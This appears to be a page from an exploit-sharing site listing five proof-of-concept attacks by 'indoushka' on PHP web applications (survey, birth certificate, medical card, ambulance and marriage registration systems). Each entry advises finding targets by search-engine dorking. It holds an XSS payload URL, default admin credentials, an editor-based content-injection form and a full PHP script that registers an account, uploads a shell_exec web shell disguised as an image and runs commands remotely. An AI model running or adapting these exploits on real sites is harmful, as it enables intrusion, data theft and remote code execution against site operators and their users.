Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Online Survey System 1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg [+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Birth Certificate System 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: admin Password: Test@123 [+] http://127.0.0.1/obcs/admin/dashboard.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Medical Card Generations System 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: admin Password: Test@123 [+] http://127.0.0.1/mcgs/admin/dashboard.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Part 01 : about-us.php [+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . [+] Line 2 : Make sure to include your database connection here [+] Line 44 : Send the form data using fetch API (Set your target url) [+] save payload as poc.php in your localhost path . [+] payload : <?php include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here if (isset($_POST['submit'])) { $pagetitle = $_POST['pagetitle']; $pagedes = $con->real_escape_string($_POST['pagedes']); $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'"); if ($query) { echo '<script>alert("About Us has been updated.")</script>'; } else { echo '<script>alert("Something Went Wrong. Please try again.")</script>'; } exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>indoushka | Update About Us Content</title>  <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script> <script type="text/javascript"> // Apply NicEdit to all text areas when the DOM is loaded bkLib.onDomLoaded(nicEditors.allTextAreas); // Function to handle form submission using JavaScript function submitForm(event) { event.preventDefault(); // Prevent default form submission const pagetitle = document.getElementById('pagetitle').value; const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content // Prepare the form data to be sent const formData = new FormData(); formData.append('pagetitle', pagetitle); formData.append('pagedes', pagedes); formData.append('submit', true); // Send the form data using fetch API fetch('http://127.0.0.1/eahp/admin/about-us.php', { method: 'POST', body: formData, }) .then(response => response.text()) .then(data => { alert('About Us content has been updated successfully.'); console.log(data); // Handle the response from the server }) .catch(error => { console.error('Error:', error); }); } </script> <style> /* Center the form container */ .editor-container { max-width: 800px; margin: 0 auto; /* Center horizontally */ padding: 20px; text-align: center; /* Center the content inside */ } /* Ensure the textarea takes the full width */ #pagedes { width: 100%; height: 300px; margin: 0 auto; } </style> </head> <body> <div id="app"> <div class="app-content"> <div class="main-content"> <div class="wrap-content container" id="container">  <section id="page-title"> <div class="row"> <div class="col-sm-8"> <h1 class="mainTitle">Update the About Us Content</h1> </div> </li> </ol> </div> </section>  <div class="container-fluid container-fullw bg-white"> <div class="row"> <div class="col-md-12">  <div class="editor-container"> <form class="forms-sample" method="post" onsubmit="submitForm(event);"> <div class="form-group"> <label for="pagetitle">Page Title</label> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required> </div> <div class="form-group"> <label for="pagedes">Page Description</label>  <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea> </div> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button> </form> </div> </div> </div> </div>  </div> </div> </div> </div>  </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : Online Marriage Registration System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir [+] payload : <?php // Parse command line arguments $options = getopt("u:c:m:p:"); $url = $options['u'] ?? null; $command = $options['c'] ?? null; $mobile = $options['m'] ?? null; $password = $options['p'] ?? 'inouvis2022'; if (!$url || !$command) { die("Usage: php script.php -u <url> -c <command> \n"); } function login($url, $mobile, $password) { $loginUrl = "{$url}/user/login.php"; $ch = curl_init($loginUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'mobno' => $mobile, 'password' => $password, 'login' => '' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_exec($ch); curl_close($ch); // Extract PHPSESSID from cookie file $cookies = file_get_contents('cookie.txt'); preg_match('/PHPSESSID=(\w+);/', $cookies, $matches); return $matches[1] ?? null; } function upload($url, $cookie) { $uploadUrl = "{$url}/user/marriage-reg-form.php"; $fileData = [ 'husimage' => curl_file_create('shell.php', 'application/x-php', '<?php $command = shell_exec($_REQUEST["cmd"]); echo $command; ?>'), 'wifeimage' => curl_file_create('test.jpg', 'image/jpeg') ]; $ch = curl_init($uploadUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); echo "[+] PHP shell uploaded\n"; } function getRemotePhpFiles($url) { $filesUrl = "{$url}/"; $ch = curl_init($filesUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); preg_match_all('/\d{10,42}\.php/', $response, $matches); return $matches[0]; } function execCommand($url, $webshell, $command) { $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command); $ch = curl_init($commandUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo "[+] Command output\n" . $output . "\n"; } function register($mobile, $password, $url) { $signupUrl = "{$url}/user/signup.php"; $ch = curl_init($signupUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'fname' => 'indoushka', 'lname' => 'indoushka', 'mobno' => $mobile, 'address' => 'indoushka', 'password' => $password, 'submit' => '' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); echo "[+] Registered with mobile phone $mobile and password '$password'\n"; } $mobile = $mobile ?? strval(rand(100000000, 999999999)); $password = $password ?? 'inouvis-2022'; if ($password === 'inouvis-2022' || $mobile === null) { register($mobile, $password, $url); } $cookie = login($url, $mobile, $password); $initialPhpFiles = getRemotePhpFiles($url); upload($url, $cookie); $finalPhpFiles = getRemotePhpFiles($url); $webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0]; execCommand($url, $webshell, $command); ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>